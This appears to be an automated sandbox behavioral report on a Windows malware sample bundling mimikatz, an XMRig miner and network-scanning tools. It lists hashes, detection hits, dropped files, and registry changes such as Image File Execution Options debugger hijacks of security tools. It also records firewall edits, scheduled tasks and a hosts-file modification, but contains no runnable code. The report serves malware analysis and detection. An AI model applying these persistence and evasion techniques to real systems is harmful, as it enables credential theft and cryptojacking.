Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240419-en -
resource tags
arch:x64arch:x86image:win10v2004-20240419-enlocale:en-usos:windows10-2004-x64system -
submitted
04/05/2024, 04:00
Behavioral task
behavioral1
Sample
2024-05-04_fa30f66cc71678193e16cea8a1dcd029_hacktools_icedid_mimikatz.exe
Resource
win7-20240215-en
General
-
Target
2024-05-04_fa30f66cc71678193e16cea8a1dcd029_hacktools_icedid_mimikatz.exe
-
Size
8.9MB
-
MD5
fa30f66cc71678193e16cea8a1dcd029
-
SHA1
cac84a7123169201a37ae08b367f8aad6f8ba16e
-
SHA256
865ffddc4af5c25f8effcb8bebd4e7a11dc49b483bf22e95dddcaf8eef824e2a
-
SHA512
f49c1ac0e7be751cc4723b20fbcd1c2dccc656dd346b7f5375bd83427f1286f6aa0a16665a63d55088ebb56dacf20ba044886ad22f0ab69c315dffe4437e5dc9
-
SSDEEP
196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 2920 created 2148 2920 jbltict.exe 38 -
Contacts a large (30806) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Detects executables containing SQL queries to confidential data stores. Observed in infostealers 2 IoCs
resource yara_rule behavioral2/memory/2732-136-0x00007FF66E780000-0x00007FF66E86E000-memory.dmp INDICATOR_SUSPICIOUS_EXE_SQLQuery_ConfidentialDataStore behavioral2/memory/2732-138-0x00007FF66E780000-0x00007FF66E86E000-memory.dmp INDICATOR_SUSPICIOUS_EXE_SQLQuery_ConfidentialDataStore -
UPX dump on OEP (original entry point) 41 IoCs
resource yara_rule behavioral2/memory/2268-0-0x0000000000400000-0x0000000000A9B000-memory.dmp UPX behavioral2/memory/2268-4-0x0000000000400000-0x0000000000A9B000-memory.dmp UPX behavioral2/files/0x000b000000023bb1-6.dat UPX behavioral2/memory/3564-8-0x0000000000400000-0x0000000000A9B000-memory.dmp UPX behavioral2/files/0x000b000000023c7a-134.dat UPX behavioral2/memory/2732-136-0x00007FF66E780000-0x00007FF66E86E000-memory.dmp UPX behavioral2/memory/2732-138-0x00007FF66E780000-0x00007FF66E86E000-memory.dmp UPX behavioral2/files/0x0008000000023c98-145.dat UPX behavioral2/memory/3252-146-0x00007FF676990000-0x00007FF6769EB000-memory.dmp UPX behavioral2/memory/3252-160-0x00007FF676990000-0x00007FF6769EB000-memory.dmp UPX behavioral2/files/0x0008000000023c95-163.dat UPX behavioral2/memory/1844-165-0x00007FF77C0F0000-0x00007FF77C210000-memory.dmp UPX behavioral2/memory/2776-171-0x00007FF676990000-0x00007FF6769EB000-memory.dmp UPX behavioral2/memory/464-175-0x00007FF676990000-0x00007FF6769EB000-memory.dmp UPX behavioral2/memory/3876-179-0x00007FF676990000-0x00007FF6769EB000-memory.dmp UPX behavioral2/memory/1844-186-0x00007FF77C0F0000-0x00007FF77C210000-memory.dmp UPX behavioral2/memory/4164-188-0x00007FF676990000-0x00007FF6769EB000-memory.dmp UPX behavioral2/memory/3680-192-0x00007FF676990000-0x00007FF6769EB000-memory.dmp UPX behavioral2/memory/2420-196-0x00007FF676990000-0x00007FF6769EB000-memory.dmp UPX behavioral2/memory/1844-198-0x00007FF77C0F0000-0x00007FF77C210000-memory.dmp UPX behavioral2/memory/4052-201-0x00007FF676990000-0x00007FF6769EB000-memory.dmp UPX behavioral2/memory/1844-204-0x00007FF77C0F0000-0x00007FF77C210000-memory.dmp UPX behavioral2/memory/1652-206-0x00007FF676990000-0x00007FF6769EB000-memory.dmp UPX behavioral2/memory/2388-210-0x00007FF676990000-0x00007FF6769EB000-memory.dmp UPX behavioral2/memory/3284-214-0x00007FF676990000-0x00007FF6769EB000-memory.dmp UPX behavioral2/memory/1844-216-0x00007FF77C0F0000-0x00007FF77C210000-memory.dmp UPX behavioral2/memory/4800-219-0x00007FF676990000-0x00007FF6769EB000-memory.dmp UPX behavioral2/memory/1844-222-0x00007FF77C0F0000-0x00007FF77C210000-memory.dmp UPX behavioral2/memory/4324-224-0x00007FF676990000-0x00007FF6769EB000-memory.dmp UPX behavioral2/memory/4340-228-0x00007FF676990000-0x00007FF6769EB000-memory.dmp UPX behavioral2/memory/2888-231-0x00007FF676990000-0x00007FF6769EB000-memory.dmp UPX behavioral2/memory/4728-233-0x00007FF676990000-0x00007FF6769EB000-memory.dmp UPX behavioral2/memory/1844-234-0x00007FF77C0F0000-0x00007FF77C210000-memory.dmp UPX behavioral2/memory/4972-236-0x00007FF676990000-0x00007FF6769EB000-memory.dmp UPX behavioral2/memory/1380-238-0x00007FF676990000-0x00007FF6769EB000-memory.dmp UPX behavioral2/memory/1844-249-0x00007FF77C0F0000-0x00007FF77C210000-memory.dmp UPX behavioral2/memory/1844-251-0x00007FF77C0F0000-0x00007FF77C210000-memory.dmp UPX behavioral2/memory/1844-252-0x00007FF77C0F0000-0x00007FF77C210000-memory.dmp UPX behavioral2/memory/1844-254-0x00007FF77C0F0000-0x00007FF77C210000-memory.dmp UPX behavioral2/memory/1844-256-0x00007FF77C0F0000-0x00007FF77C210000-memory.dmp UPX behavioral2/memory/1844-257-0x00007FF77C0F0000-0x00007FF77C210000-memory.dmp UPX -
XMRig Miner payload 12 IoCs
resource yara_rule behavioral2/memory/1844-186-0x00007FF77C0F0000-0x00007FF77C210000-memory.dmp xmrig behavioral2/memory/1844-198-0x00007FF77C0F0000-0x00007FF77C210000-memory.dmp xmrig behavioral2/memory/1844-204-0x00007FF77C0F0000-0x00007FF77C210000-memory.dmp xmrig behavioral2/memory/1844-216-0x00007FF77C0F0000-0x00007FF77C210000-memory.dmp xmrig behavioral2/memory/1844-222-0x00007FF77C0F0000-0x00007FF77C210000-memory.dmp xmrig behavioral2/memory/1844-234-0x00007FF77C0F0000-0x00007FF77C210000-memory.dmp xmrig behavioral2/memory/1844-249-0x00007FF77C0F0000-0x00007FF77C210000-memory.dmp xmrig behavioral2/memory/1844-251-0x00007FF77C0F0000-0x00007FF77C210000-memory.dmp xmrig behavioral2/memory/1844-252-0x00007FF77C0F0000-0x00007FF77C210000-memory.dmp xmrig behavioral2/memory/1844-254-0x00007FF77C0F0000-0x00007FF77C210000-memory.dmp xmrig behavioral2/memory/1844-256-0x00007FF77C0F0000-0x00007FF77C210000-memory.dmp xmrig behavioral2/memory/1844-257-0x00007FF77C0F0000-0x00007FF77C210000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 6 IoCs
resource yara_rule behavioral2/memory/2268-0-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/2268-4-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/files/0x000b000000023bb1-6.dat mimikatz behavioral2/memory/3564-8-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/2732-136-0x00007FF66E780000-0x00007FF66E86E000-memory.dmp mimikatz behavioral2/memory/2732-138-0x00007FF66E780000-0x00007FF66E86E000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts jbltict.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts jbltict.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 1516 netsh.exe 4768 netsh.exe -
Sets file execution options in registry 2 TTPs 40 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe jbltict.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jbltict.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jbltict.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jbltict.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jbltict.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jbltict.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe jbltict.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe jbltict.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jbltict.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe jbltict.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe jbltict.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe jbltict.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe jbltict.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jbltict.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe jbltict.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe jbltict.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe jbltict.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jbltict.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jbltict.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe jbltict.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jbltict.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jbltict.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jbltict.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jbltict.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe jbltict.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe jbltict.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe jbltict.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jbltict.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jbltict.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jbltict.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jbltict.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jbltict.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe jbltict.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe jbltict.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jbltict.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe jbltict.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe jbltict.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe jbltict.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe jbltict.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jbltict.exe -
Executes dropped EXE 29 IoCs
pid Process 3564 jbltict.exe 2920 jbltict.exe 4480 wpcap.exe 3284 ykkbmqtil.exe 2732 vfshost.exe 1484 xohudmc.exe 3252 ijkbpltap.exe 2700 zebhau.exe 1844 etbisp.exe 2776 ijkbpltap.exe 464 ijkbpltap.exe 3876 ijkbpltap.exe 220 jbltict.exe 4164 ijkbpltap.exe 3680 ijkbpltap.exe 2420 ijkbpltap.exe 4052 ijkbpltap.exe 1652 ijkbpltap.exe 2388 ijkbpltap.exe 3284 ijkbpltap.exe 4800 ijkbpltap.exe 4324 ijkbpltap.exe 4340 ijkbpltap.exe 2888 ijkbpltap.exe 4728 ijkbpltap.exe 4972 ijkbpltap.exe 1380 ijkbpltap.exe 3612 luiilunid.exe 208 jbltict.exe -
Loads dropped DLL 12 IoCs
pid Process 4480 wpcap.exe 4480 wpcap.exe 4480 wpcap.exe 4480 wpcap.exe 4480 wpcap.exe 4480 wpcap.exe 4480 wpcap.exe 4480 wpcap.exe 4480 wpcap.exe 3284 ykkbmqtil.exe 3284 ykkbmqtil.exe 3284 ykkbmqtil.exe -
resource yara_rule behavioral2/files/0x000b000000023c7a-134.dat upx behavioral2/memory/2732-136-0x00007FF66E780000-0x00007FF66E86E000-memory.dmp upx behavioral2/memory/2732-138-0x00007FF66E780000-0x00007FF66E86E000-memory.dmp upx behavioral2/files/0x0008000000023c98-145.dat upx behavioral2/memory/3252-146-0x00007FF676990000-0x00007FF6769EB000-memory.dmp upx behavioral2/memory/3252-160-0x00007FF676990000-0x00007FF6769EB000-memory.dmp upx behavioral2/files/0x0008000000023c95-163.dat upx behavioral2/memory/1844-165-0x00007FF77C0F0000-0x00007FF77C210000-memory.dmp upx behavioral2/memory/2776-171-0x00007FF676990000-0x00007FF6769EB000-memory.dmp upx behavioral2/memory/464-175-0x00007FF676990000-0x00007FF6769EB000-memory.dmp upx behavioral2/memory/3876-179-0x00007FF676990000-0x00007FF6769EB000-memory.dmp upx behavioral2/memory/1844-186-0x00007FF77C0F0000-0x00007FF77C210000-memory.dmp upx behavioral2/memory/4164-188-0x00007FF676990000-0x00007FF6769EB000-memory.dmp upx behavioral2/memory/3680-192-0x00007FF676990000-0x00007FF6769EB000-memory.dmp upx behavioral2/memory/2420-196-0x00007FF676990000-0x00007FF6769EB000-memory.dmp upx behavioral2/memory/1844-198-0x00007FF77C0F0000-0x00007FF77C210000-memory.dmp upx behavioral2/memory/4052-201-0x00007FF676990000-0x00007FF6769EB000-memory.dmp upx behavioral2/memory/1844-204-0x00007FF77C0F0000-0x00007FF77C210000-memory.dmp upx behavioral2/memory/1652-206-0x00007FF676990000-0x00007FF6769EB000-memory.dmp upx behavioral2/memory/2388-210-0x00007FF676990000-0x00007FF6769EB000-memory.dmp upx behavioral2/memory/3284-214-0x00007FF676990000-0x00007FF6769EB000-memory.dmp upx behavioral2/memory/1844-216-0x00007FF77C0F0000-0x00007FF77C210000-memory.dmp upx behavioral2/memory/4800-219-0x00007FF676990000-0x00007FF6769EB000-memory.dmp upx behavioral2/memory/1844-222-0x00007FF77C0F0000-0x00007FF77C210000-memory.dmp upx behavioral2/memory/4324-224-0x00007FF676990000-0x00007FF6769EB000-memory.dmp upx behavioral2/memory/4340-228-0x00007FF676990000-0x00007FF6769EB000-memory.dmp upx behavioral2/memory/2888-231-0x00007FF676990000-0x00007FF6769EB000-memory.dmp upx behavioral2/memory/4728-233-0x00007FF676990000-0x00007FF6769EB000-memory.dmp upx behavioral2/memory/1844-234-0x00007FF77C0F0000-0x00007FF77C210000-memory.dmp upx behavioral2/memory/4972-236-0x00007FF676990000-0x00007FF6769EB000-memory.dmp upx behavioral2/memory/1380-238-0x00007FF676990000-0x00007FF6769EB000-memory.dmp upx behavioral2/memory/1844-249-0x00007FF77C0F0000-0x00007FF77C210000-memory.dmp upx behavioral2/memory/1844-251-0x00007FF77C0F0000-0x00007FF77C210000-memory.dmp upx behavioral2/memory/1844-252-0x00007FF77C0F0000-0x00007FF77C210000-memory.dmp upx behavioral2/memory/1844-254-0x00007FF77C0F0000-0x00007FF77C210000-memory.dmp upx behavioral2/memory/1844-256-0x00007FF77C0F0000-0x00007FF77C210000-memory.dmp upx behavioral2/memory/1844-257-0x00007FF77C0F0000-0x00007FF77C210000-memory.dmp upx -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 83 ifconfig.me 84 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft jbltict.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\zebhau.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies jbltict.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache jbltict.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 jbltict.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 jbltict.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 jbltict.exe File created C:\Windows\system32\Packet.dll wpcap.exe File created C:\Windows\SysWOW64\zebhau.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content jbltict.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2326C1864DE719190C396A6E8734D8B4 jbltict.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2326C1864DE719190C396A6E8734D8B4 jbltict.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE jbltict.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData jbltict.exe -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
description ioc Process File created C:\Windows\bduajgtgb\UnattendGC\specials\docmicfg.exe jbltict.exe File created C:\Windows\bduajgtgb\ypilwlgzb\scan.bat jbltict.exe File created C:\Windows\bduajgtgb\UnattendGC\specials\coli-0.dll jbltict.exe File created C:\Windows\bduajgtgb\UnattendGC\specials\vimpcsvc.exe jbltict.exe File created C:\Windows\fbmdkvil\schoedcl.xml jbltict.exe File created C:\Windows\bduajgtgb\Corporate\mimilib.dll jbltict.exe File created C:\Windows\bduajgtgb\UnattendGC\specials\ssleay32.dll jbltict.exe File created C:\Windows\fbmdkvil\spoolsrv.xml jbltict.exe File created C:\Windows\fbmdkvil\docmicfg.xml jbltict.exe File created C:\Windows\bduajgtgb\Corporate\mimidrv.sys jbltict.exe File created C:\Windows\ime\jbltict.exe jbltict.exe File opened for modification C:\Windows\bduajgtgb\Corporate\log.txt cmd.exe File created C:\Windows\bduajgtgb\UnattendGC\specials\libxml2.dll jbltict.exe File created C:\Windows\bduajgtgb\UnattendGC\specials\zlib1.dll jbltict.exe File created C:\Windows\bduajgtgb\UnattendGC\specials\spoolsrv.xml jbltict.exe File created C:\Windows\bduajgtgb\UnattendGC\specials\vimpcsvc.xml jbltict.exe File created C:\Windows\bduajgtgb\UnattendGC\specials\ucl.dll jbltict.exe File created C:\Windows\bduajgtgb\UnattendGC\specials\spoolsrv.exe jbltict.exe File created C:\Windows\bduajgtgb\UnattendGC\docmicfg.xml jbltict.exe File created C:\Windows\bduajgtgb\ypilwlgzb\luiilunid.exe jbltict.exe File created C:\Windows\bduajgtgb\UnattendGC\specials\trfo-2.dll jbltict.exe File created C:\Windows\bduajgtgb\UnattendGC\spoolsrv.xml jbltict.exe File created C:\Windows\bduajgtgb\UnattendGC\specials\svschost.xml jbltict.exe File created C:\Windows\bduajgtgb\UnattendGC\specials\trch-1.dll jbltict.exe File created C:\Windows\bduajgtgb\ypilwlgzb\wpcap.exe jbltict.exe File created C:\Windows\bduajgtgb\UnattendGC\specials\crli-0.dll jbltict.exe File created C:\Windows\bduajgtgb\UnattendGC\specials\tibe-2.dll jbltict.exe File created C:\Windows\bduajgtgb\UnattendGC\svschost.xml jbltict.exe File created C:\Windows\bduajgtgb\UnattendGC\specials\docmicfg.xml jbltict.exe File opened for modification C:\Windows\fbmdkvil\spoolsrv.xml jbltict.exe File opened for modification C:\Windows\fbmdkvil\vimpcsvc.xml jbltict.exe File created C:\Windows\fbmdkvil\jbltict.exe 2024-05-04_fa30f66cc71678193e16cea8a1dcd029_hacktools_icedid_mimikatz.exe File created C:\Windows\bduajgtgb\Corporate\vfshost.exe jbltict.exe File created C:\Windows\bduajgtgb\UnattendGC\specials\exma-1.dll jbltict.exe File created C:\Windows\fbmdkvil\svschost.xml jbltict.exe File created C:\Windows\bduajgtgb\UnattendGC\specials\cnli-1.dll jbltict.exe File created C:\Windows\bduajgtgb\UnattendGC\specials\xdvl-0.dll jbltict.exe File created C:\Windows\fbmdkvil\vimpcsvc.xml jbltict.exe File opened for modification C:\Windows\bduajgtgb\ypilwlgzb\Packet.dll jbltict.exe File created C:\Windows\bduajgtgb\UnattendGC\AppCapture32.dll jbltict.exe File opened for modification C:\Windows\bduajgtgb\ypilwlgzb\Result.txt luiilunid.exe File opened for modification C:\Windows\fbmdkvil\schoedcl.xml jbltict.exe File opened for modification C:\Windows\fbmdkvil\svschost.xml jbltict.exe File created C:\Windows\bduajgtgb\UnattendGC\AppCapture64.dll jbltict.exe File created C:\Windows\bduajgtgb\ypilwlgzb\ip.txt jbltict.exe File created C:\Windows\bduajgtgb\ypilwlgzb\wpcap.dll jbltict.exe File created C:\Windows\bduajgtgb\UnattendGC\specials\posh-0.dll jbltict.exe File created C:\Windows\bduajgtgb\UnattendGC\specials\schoedcl.exe jbltict.exe File created C:\Windows\bduajgtgb\UnattendGC\schoedcl.xml jbltict.exe File created C:\Windows\bduajgtgb\ypilwlgzb\Packet.dll jbltict.exe File created C:\Windows\bduajgtgb\UnattendGC\specials\svschost.exe jbltict.exe File created C:\Windows\bduajgtgb\UnattendGC\specials\schoedcl.xml jbltict.exe File opened for modification C:\Windows\fbmdkvil\docmicfg.xml jbltict.exe File created C:\Windows\bduajgtgb\UnattendGC\Shellcode.ini jbltict.exe File opened for modification C:\Windows\fbmdkvil\jbltict.exe 2024-05-04_fa30f66cc71678193e16cea8a1dcd029_hacktools_icedid_mimikatz.exe File created C:\Windows\bduajgtgb\UnattendGC\vimpcsvc.xml jbltict.exe File created C:\Windows\bduajgtgb\ypilwlgzb\ykkbmqtil.exe jbltict.exe File created C:\Windows\bduajgtgb\UnattendGC\specials\tucl-1.dll jbltict.exe File created C:\Windows\bduajgtgb\upbdrjv\swrpwe.exe jbltict.exe File created C:\Windows\bduajgtgb\UnattendGC\specials\libeay32.dll jbltict.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4428 sc.exe 220 sc.exe 3692 sc.exe 2256 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
NSIS installer 3 IoCs
resource yara_rule behavioral2/files/0x000b000000023bb1-6.dat nsis_installer_2 behavioral2/files/0x000a000000023bc3-15.dat nsis_installer_1 behavioral2/files/0x000a000000023bc3-15.dat nsis_installer_2 -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4696 schtasks.exe 4416 schtasks.exe 1004 schtasks.exe -
Modifies data under HKEY_USERS 45 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ijkbpltap.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ijkbpltap.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ijkbpltap.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ijkbpltap.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals ijkbpltap.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ijkbpltap.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ijkbpltap.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ijkbpltap.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ijkbpltap.exe Key created \REGISTRY\USER\.DEFAULT\Software ijkbpltap.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ijkbpltap.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ijkbpltap.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ijkbpltap.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ijkbpltap.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing ijkbpltap.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ijkbpltap.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ijkbpltap.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ijkbpltap.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ijkbpltap.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ijkbpltap.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ijkbpltap.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ijkbpltap.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" jbltict.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ijkbpltap.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ijkbpltap.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ijkbpltap.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ijkbpltap.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ijkbpltap.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ijkbpltap.exe 